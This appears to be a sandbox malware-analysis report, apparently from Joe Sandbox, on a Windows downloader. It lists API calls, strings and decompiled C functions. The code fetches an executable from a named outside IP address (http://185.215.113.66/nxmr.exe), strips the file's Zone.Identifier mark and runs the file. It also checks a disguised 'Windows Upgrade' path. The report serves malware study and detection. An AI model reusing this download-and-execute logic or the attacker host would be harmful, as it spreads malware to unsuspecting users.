                                                                                                                                                                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00021137
                                                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,000214DA,00000000,00000000,00000000,00000000), ref: 00021163
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00021192
                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 000211C5
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 000211F6
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00021205
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00021210
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00021229
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00021239
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00021244
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0002126F
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0002127C
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00021289
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 00021294
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 000212A9
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 000212BD
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 000212C3
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 000212D7
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 000212FE
                                                                                                                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,000214DA,?,00000000,00000000), ref: 00021318
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00021334
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00021344
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • %s:Zone.Identifier, xrefs: 0002121D
                                                                                                                                                                                                                                                                                    • %s\%d%d.exe, xrefs: 00021115
                                                                                                                                                                                                                                                                                    • %temp%, xrefs: 000210DB
                                                                                                                                                                                                                                                                                    • %s\%d%d.exe, xrefs: 000212F2
                                                                                                                                                                                                                                                                                    • %s:Zone.Identifier, xrefs: 00021328
                                                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 00021132
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.882368593.0000000000021000.00000020.00000001.01000000.00000007.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882359979.0000000000020000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882391738.0000000000022000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882401431.0000000000023000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882407647.0000000000024000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_20000_150623101.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$Internetrand$CloseHandleSleepwsprintf$DeleteOpen$CountCreateDownloadEnvironmentExpandReadStringsTickWritesrand
                                                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                                                                                                                                    • API String ID: 4178003460-1161929716
                                                                                                                                                                                                                                                                                    • Opcode ID: 040425465a55b1d36642e6014f0a2c1b58adb3f1e3fbf941faa654664217f98b
                                                                                                                                                                                                                                                                                    • Instruction ID: 644b51cc72f04cc98cd4159d7b6ab8134a96b807b9d2046c66ff0387434e1d52
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 040425465a55b1d36642e6014f0a2c1b58adb3f1e3fbf941faa654664217f98b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D61C671940228BBE734DBA0EC89FEA737DAB58701F144598F30D960C1DA786B85CF61
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                                                                                                                                                    			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                                                    				CHAR* _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                                    				struct _STARTUPINFOA _v96;
                                                                                                                                                                                                                                                                                    				int _v100;
                                                                                                                                                                                                                                                                                    				char** _v104;
                                                                                                                                                                                                                                                                                    				int _v108;
                                                                                                                                                                                                                                                                                    				void _v112;
                                                                                                                                                                                                                                                                                    				char** _v116;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v120;
                                                                                                                                                                                                                                                                                    				intOrPtr _v124;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t23;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t24;
                                                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                                                    				void _t29;
                                                                                                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                                                                                                    				signed int _t38;
                                                                                                                                                                                                                                                                                    				int _t40;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t41;
                                                                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                                                                                                    				intOrPtr _t49;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                                                                                                                                    				_push(0x22358);
                                                                                                                                                                                                                                                                                    				_push(0x21680);
                                                                                                                                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                    				 *[fs:0x0] = _t58;
                                                                                                                                                                                                                                                                                    				_v28 = _t58 - 0x68;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				__set_app_type(2);
                                                                                                                                                                                                                                                                                    				 *0x231d0 =  *0x231d0 | 0xffffffff;
                                                                                                                                                                                                                                                                                    				 *0x231d4 =  *0x231d4 | 0xffffffff;
                                                                                                                                                                                                                                                                                    				_t23 = __p__fmode();
                                                                                                                                                                                                                                                                                    				_t46 =  *0x231cc; // 0x0
                                                                                                                                                                                                                                                                                    				 *_t23 = _t46;
                                                                                                                                                                                                                                                                                    				_t24 = __p__commode();
                                                                                                                                                                                                                                                                                    				_t47 =  *0x231c8; // 0x0
                                                                                                                                                                                                                                                                                    				 *_t24 = _t47;
                                                                                                                                                                                                                                                                                    				 *0x231d8 = _adjust_fdiv;
                                                                                                                                                                                                                                                                                    				_t27 = E00021677( *_adjust_fdiv);
                                                                                                                                                                                                                                                                                    				_t61 =  *0x231b8; // 0x1
                                                                                                                                                                                                                                                                                    				if(_t61 == 0) {
                                                                                                                                                                                                                                                                                    					__setusermatherr(E00021674);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				E00021662(_t27);
                                                                                                                                                                                                                                                                                    				_push(0x2300c);
                                                                                                                                                                                                                                                                                    				_push(0x23008);
                                                                                                                                                                                                                                                                                    				L0002165C();
                                                                                                                                                                                                                                                                                    				_t29 =  *0x231c4; // 0x0
                                                                                                                                                                                                                                                                                    				_v112 = _t29;
                                                                                                                                                                                                                                                                                    				__getmainargs( &_v100,  &_v116,  &_v104,  *0x231c0,  &_v112);
                                                                                                                                                                                                                                                                                    				_push(0x23004);
                                                                                                                                                                                                                                                                                    				_push(0x23000);
                                                                                                                                                                                                                                                                                    				L0002165C();
                                                                                                                                                                                                                                                                                    				_t55 =  *_acmdln;
                                                                                                                                                                                                                                                                                    				_v120 = _t55;
                                                                                                                                                                                                                                                                                    				if( *_t55 != 0x22) {
                                                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                                                    						__eflags =  *_t55 - 0x20;
                                                                                                                                                                                                                                                                                    						if(__eflags <= 0) {
                                                                                                                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t55 = _t55 + 1;
                                                                                                                                                                                                                                                                                    						_v120 = _t55;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						_t55 = _t55 + 1;
                                                                                                                                                                                                                                                                                    						_v120 = _t55;
                                                                                                                                                                                                                                                                                    						_t42 =  *_t55;
                                                                                                                                                                                                                                                                                    					} while (_t42 != 0 && _t42 != 0x22);
                                                                                                                                                                                                                                                                                    					if( *_t55 == 0x22) {
                                                                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                                                                    						_t55 = _t55 + 1;
                                                                                                                                                                                                                                                                                    						_v120 = _t55;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L7:
                                                                                                                                                                                                                                                                                    				_t36 =  *_t55;
                                                                                                                                                                                                                                                                                    				if(_t36 != 0 && _t36 <= 0x20) {
                                                                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v96.dwFlags = 0;
                                                                                                                                                                                                                                                                                    				GetStartupInfoA( &_v96);
                                                                                                                                                                                                                                                                                    				_t69 = _v96.dwFlags & 0x00000001;
                                                                                                                                                                                                                                                                                    				if((_v96.dwFlags & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                    					_t38 = 0xa;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t40 = E00021460(_t69, GetModuleHandleA(0), 0, _t55, _t38); // executed
                                                                                                                                                                                                                                                                                    				_v108 = _t40;
                                                                                                                                                                                                                                                                                    				exit(_t40); // executed
                                                                                                                                                                                                                                                                                    				_t41 = _v24;
                                                                                                                                                                                                                                                                                    				_t49 =  *((intOrPtr*)( *_t41));
                                                                                                                                                                                                                                                                                    				_v124 = _t49;
                                                                                                                                                                                                                                                                                    				_push(_t41);
                                                                                                                                                                                                                                                                                    				_push(_t49);
                                                                                                                                                                                                                                                                                    				L00021656();
                                                                                                                                                                                                                                                                                    				return _t41;
                                                                                                                                                                                                                                                                                    			}





























                                                                                                                                                                                                                                                                                    0x000214fb
                                                                                                                                                                                                                                                                                    0x000214fd
                                                                                                                                                                                                                                                                                    0x00021502
                                                                                                                                                                                                                                                                                    0x0002150d
                                                                                                                                                                                                                                                                                    0x0002150e
                                                                                                                                                                                                                                                                                    0x0002151b
                                                                                                                                                                                                                                                                                    0x00021520
                                                                                                                                                                                                                                                                                    0x00021525
                                                                                                                                                                                                                                                                                    0x0002152c
                                                                                                                                                                                                                                                                                    0x00021533
                                                                                                                                                                                                                                                                                    0x0002153a
                                                                                                                                                                                                                                                                                    0x00021540
                                                                                                                                                                                                                                                                                    0x00021546
                                                                                                                                                                                                                                                                                    0x00021548
                                                                                                                                                                                                                                                                                    0x0002154e
                                                                                                                                                                                                                                                                                    0x00021554
                                                                                                                                                                                                                                                                                    0x0002155d
                                                                                                                                                                                                                                                                                    0x00021562
                                                                                                                                                                                                                                                                                    0x00021567
                                                                                                                                                                                                                                                                                    0x0002156d
                                                                                                                                                                                                                                                                                    0x00021574
                                                                                                                                                                                                                                                                                    0x0002157a
                                                                                                                                                                                                                                                                                    0x0002157b
                                                                                                                                                                                                                                                                                    0x00021580
                                                                                                                                                                                                                                                                                    0x00021585
                                                                                                                                                                                                                                                                                    0x0002158a
                                                                                                                                                                                                                                                                                    0x0002158f
                                                                                                                                                                                                                                                                                    0x00021594
                                                                                                                                                                                                                                                                                    0x000215ad
                                                                                                                                                                                                                                                                                    0x000215b3
                                                                                                                                                                                                                                                                                    0x000215b8
                                                                                                                                                                                                                                                                                    0x000215bd
                                                                                                                                                                                                                                                                                    0x000215ca
                                                                                                                                                                                                                                                                                    0x000215cc
                                                                                                                                                                                                                                                                                    0x000215d2
                                                                                                                                                                                                                                                                                    0x0002160e
                                                                                                                                                                                                                                                                                    0x0002160e
                                                                                                                                                                                                                                                                                    0x00021611
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00021613
                                                                                                                                                                                                                                                                                    0x00021614
                                                                                                                                                                                                                                                                                    0x00021614
                                                                                                                                                                                                                                                                                    0x000215d4
                                                                                                                                                                                                                                                                                    0x000215d4
                                                                                                                                                                                                                                                                                    0x000215d4
                                                                                                                                                                                                                                                                                    0x000215d5
                                                                                                                                                                                                                                                                                    0x000215d8
                                                                                                                                                                                                                                                                                    0x000215da
                                                                                                                                                                                                                                                                                    0x000215e5
                                                                                                                                                                                                                                                                                    0x000215e7
                                                                                                                                                                                                                                                                                    0x000215e7
                                                                                                                                                                                                                                                                                    0x000215e8
                                                                                                                                                                                                                                                                                    0x000215e8
                                                                                                                                                                                                                                                                                    0x000215e5
                                                                                                                                                                                                                                                                                    0x000215eb
                                                                                                                                                                                                                                                                                    0x000215eb
                                                                                                                                                                                                                                                                                    0x000215ef
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x000215f5
                                                                                                                                                                                                                                                                                    0x000215fc
                                                                                                                                                                                                                                                                                    0x00021602
                                                                                                                                                                                                                                                                                    0x00021606
                                                                                                                                                                                                                                                                                    0x0002161b
                                                                                                                                                                                                                                                                                    0x00021608
                                                                                                                                                                                                                                                                                    0x00021608
                                                                                                                                                                                                                                                                                    0x00021608
                                                                                                                                                                                                                                                                                    0x00021627
                                                                                                                                                                                                                                                                                    0x0002162c
                                                                                                                                                                                                                                                                                    0x00021630
                                                                                                                                                                                                                                                                                    0x00021636
                                                                                                                                                                                                                                                                                    0x0002163b
                                                                                                                                                                                                                                                                                    0x0002163d
                                                                                                                                                                                                                                                                                    0x00021640
                                                                                                                                                                                                                                                                                    0x00021641
                                                                                                                                                                                                                                                                                    0x00021642
                                                                                                                                                                                                                                                                                    0x00021649

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.882368593.0000000000021000.00000020.00000001.01000000.00000007.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882359979.0000000000020000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882391738.0000000000022000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882401431.0000000000023000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882407647.0000000000024000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_20000_150623101.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 801014965-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e04c30a9260d44feb0bd3bad7f823119d2f070e25c1d46f5ad9e4deb93bb3209
                                                                                                                                                                                                                                                                                    • Instruction ID: 5628c538e6e80bc03f01b90331fc1b28c8f15ac1c36323ca04e4ba4c929c2593
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e04c30a9260d44feb0bd3bad7f823119d2f070e25c1d46f5ad9e4deb93bb3209
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 664161B1940368EFE734DFE4E889AEDBBB8FB19710F24055AE54697292C7384942CB50
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 39 21000-21060 memset * 2 CreateProcessW 40 21062-2106f Sleep 39->40 41 21071-21095 ShellExecuteW 39->41 42 210a8-210ab 40->42 43 210a6 41->43 44 21097-210a4 Sleep 41->44 43->42 44->42
                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00021000(WCHAR* _a4) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                                                                                                                    				struct _STARTUPINFOW _v100;
                                                                                                                                                                                                                                                                                    				intOrPtr _v104;
                                                                                                                                                                                                                                                                                    				int _t18;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				memset( &_v100, 0, 0x44);
                                                                                                                                                                                                                                                                                    				memset( &_v24, 0, 0x10);
                                                                                                                                                                                                                                                                                    				_v100.cb = 0x44;
                                                                                                                                                                                                                                                                                    				_v100.dwFlags = 1;
                                                                                                                                                                                                                                                                                    				_v100.wShowWindow = 5;
                                                                                                                                                                                                                                                                                    				_t18 = CreateProcessW(0, _a4, 0, 0, 0, 0x20, 0, 0,  &_v100,  &_v24); // executed
                                                                                                                                                                                                                                                                                    				if(_t18 != 1) {
                                                                                                                                                                                                                                                                                    					_v8 = ShellExecuteW(0, L"open", _a4, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					_v104 = _v8;
                                                                                                                                                                                                                                                                                    					if(_v104 <= 0x20) {
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                                    				return 1;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x0002100e
                                                                                                                                                                                                                                                                                    0x0002101e
                                                                                                                                                                                                                                                                                    0x00021026
                                                                                                                                                                                                                                                                                    0x0002102d
                                                                                                                                                                                                                                                                                    0x00021039
                                                                                                                                                                                                                                                                                    0x00021057
                                                                                                                                                                                                                                                                                    0x00021060
                                                                                                                                                                                                                                                                                    0x00021088
                                                                                                                                                                                                                                                                                    0x0002108e
                                                                                                                                                                                                                                                                                    0x00021095
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x000210a6
                                                                                                                                                                                                                                                                                    0x0002109c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x000210a2
                                                                                                                                                                                                                                                                                    0x00021067
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0002100E
                                                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0002101E
                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,00021356,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00021057
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00021067
                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00021356,00000000,00000000,00000000), ref: 00021082
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0002109C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.882368593.0000000000021000.00000020.00000001.01000000.00000007.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882359979.0000000000020000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882391738.0000000000022000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882401431.0000000000023000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882407647.0000000000024000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_20000_150623101.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                                                                                                                                                                    • String ID: $D$open
                                                                                                                                                                                                                                                                                    • API String ID: 3787208655-2182757814
                                                                                                                                                                                                                                                                                    • Opcode ID: 175bfaeb84c375c20e1f1184135a3fcc80cbf1e5222bcfeee31ff827bd311e1d
                                                                                                                                                                                                                                                                                    • Instruction ID: 34cdd73975ef900d096d25cf11a4a75bc28eb8209b4e1995cb36369cc10901d8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 175bfaeb84c375c20e1f1184135a3fcc80cbf1e5222bcfeee31ff827bd311e1d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0111F71A84318BBEB20DBD0DD86FED7778AB14B01F200115F7096E2C2D6B56A45C795
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 45 21360-213ab ExpandEnvironmentStringsW wsprintfW PathFileExistsW 46 213b3-213dc CreateFileW 45->46 47 213ad-213af 45->47 49 213eb 46->49 50 213de-213e5 CloseHandle 46->50 48 213ed-213f0 47->48 49->48 50->49
                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00021360() {
                                                                                                                                                                                                                                                                                    				short _v524;
                                                                                                                                                                                                                                                                                    				short _v1044;
                                                                                                                                                                                                                                                                                    				void* _v1048;
                                                                                                                                                                                                                                                                                    				int _t13;
                                                                                                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				ExpandEnvironmentStringsW(L"%userprofile%",  &_v524, 0x104);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v1044, L"%s\\523333343.jpg",  &_v524);
                                                                                                                                                                                                                                                                                    				_t13 = PathFileExistsW( &_v1044); // executed
                                                                                                                                                                                                                                                                                    				if(_t13 == 0) {
                                                                                                                                                                                                                                                                                    					_t14 = CreateFileW( &_v1044, 0x40000000, 0, 0, 1, 2, 0); // executed
                                                                                                                                                                                                                                                                                    					_v1048 = _t14;
                                                                                                                                                                                                                                                                                    					if(_v1048 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						CloseHandle(_v1048); // executed
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x0002137a
                                                                                                                                                                                                                                                                                    0x00021393
                                                                                                                                                                                                                                                                                    0x000213a3
                                                                                                                                                                                                                                                                                    0x000213ab
                                                                                                                                                                                                                                                                                    0x000213c9
                                                                                                                                                                                                                                                                                    0x000213cf
                                                                                                                                                                                                                                                                                    0x000213dc
                                                                                                                                                                                                                                                                                    0x000213e5
                                                                                                                                                                                                                                                                                    0x000213e5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x000213eb
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 0002137A
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00021393
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 000213A3
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 000213C9
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 000213E5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.882368593.0000000000021000.00000020.00000001.01000000.00000007.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882359979.0000000000020000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882391738.0000000000022000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882401431.0000000000023000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882407647.0000000000024000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_20000_150623101.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                                                                                                                                                                                                                    • String ID: %s\523333343.jpg$%userprofile%
                                                                                                                                                                                                                                                                                    • API String ID: 750032643-3301017933
                                                                                                                                                                                                                                                                                    • Opcode ID: d17642de2e1783d60286cfd9fc089db1a44394cb4e8d416d70d688f13358cf23
                                                                                                                                                                                                                                                                                    • Instruction ID: ebbeb8795d1bc08305cf6fc586b2dd649c610eb65a1c629cce43392dfa2ef3ca
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d17642de2e1783d60286cfd9fc089db1a44394cb4e8d416d70d688f13358cf23
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2501A7B054031CBBE730DBA0AC89FE67378AB44704F104694F715951D2D6B55BC9CFA5
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00021460(void* __eflags) {
                                                                                                                                                                                                                                                                                    				short _v524;
                                                                                                                                                                                                                                                                                    				short _v1044;
                                                                                                                                                                                                                                                                                    				signed char _t5;
                                                                                                                                                                                                                                                                                    				signed char _t8;
                                                                                                                                                                                                                                                                                    				int _t12;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                                    				_t5 = E00021400(); // executed
                                                                                                                                                                                                                                                                                    				if((_t5 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                    					_t8 = E00021360(); // executed
                                                                                                                                                                                                                                                                                    					if((_t8 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                    						ExpandEnvironmentStringsW(L"%userprofile%",  &_v1044, 0x104);
                                                                                                                                                                                                                                                                                    						wsprintfW( &_v524, L"%s\\Windows Upgrade\\wupgrdsv.exe",  &_v1044);
                                                                                                                                                                                                                                                                                    						_t12 = PathFileExistsW( &_v524); // executed
                                                                                                                                                                                                                                                                                    						if(_t12 == 0) {
                                                                                                                                                                                                                                                                                    							E000210B0(L"http://185.215.113.66/nxmr.exe"); // executed
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x0002146e
                                                                                                                                                                                                                                                                                    0x00021474
                                                                                                                                                                                                                                                                                    0x0002147e
                                                                                                                                                                                                                                                                                    0x00021480
                                                                                                                                                                                                                                                                                    0x0002148a
                                                                                                                                                                                                                                                                                    0x0002149d
                                                                                                                                                                                                                                                                                    0x000214b6
